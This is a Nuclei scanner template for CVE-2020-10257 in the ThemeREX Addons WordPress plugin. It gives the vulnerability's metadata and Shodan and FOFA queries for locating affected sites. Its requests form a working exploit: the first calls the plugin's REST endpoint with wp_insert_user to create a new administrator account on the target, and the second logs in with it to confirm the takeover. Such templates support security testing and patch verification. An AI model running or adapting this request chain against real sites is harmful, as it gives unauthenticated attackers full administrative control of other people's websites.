id: CVE-2020-10257

info:
  name: ThemeREX Addons - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    ThemeREX Addons plugin before 2020-03-09 for WordPress contains an access control vulnerability in the /trx_addons/v2/get/sc_layout REST API endpoint, allowing any users to execute PHP functions because includes/plugin.rest-api.php calls trx_addons_rest_get_sc_layout with an unsafe sc parameter, letting attackers execute arbitrary PHP functions, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP functions, potentially leading to remote code execution and full site compromise.
  remediation: |
    Update to version 2020-03-09 or later to fix access control issues.
  reference:
    - https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/
    - https://wpscan.com/vulnerability/4ed4e60e-5bbb-4010-a7fe-40eadd8dee64/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10257
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10257
    epss-score: 0.6663
    epss-percentile: 0.98558
    cwe-id: CWE-94
    cpe: cpe:2.3:a:themerex:addons:1.70.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    product: themerex
    framework: wordpress
    shodan-query: 'http.html:trx_addons'
    fofa-query: 'body=trx_addons'
  tags: cve,cve2020,rce,wordpress,wp-plugin,wp,themerex,unauth,vkev

variables:
  username: '{{rand_text_alpha(6)}}'
  password: '{{rand_text_alpha(6)}}'

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login={{username}}&user_pass={{password}} HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"data\":")'
          - 'status_code==200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code==302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
# digest: 490a0046304402204222a72dc5c1039e7a77d635b9b47c4f409ab5d6480f6ec00eef84cad9fcb02e022052be8ad7424eb72dc3ae4de5a923248d8a48dc4fd3e82d9b34d1a08de0ab38aa:922c64590222798bb761d5b6d8e72950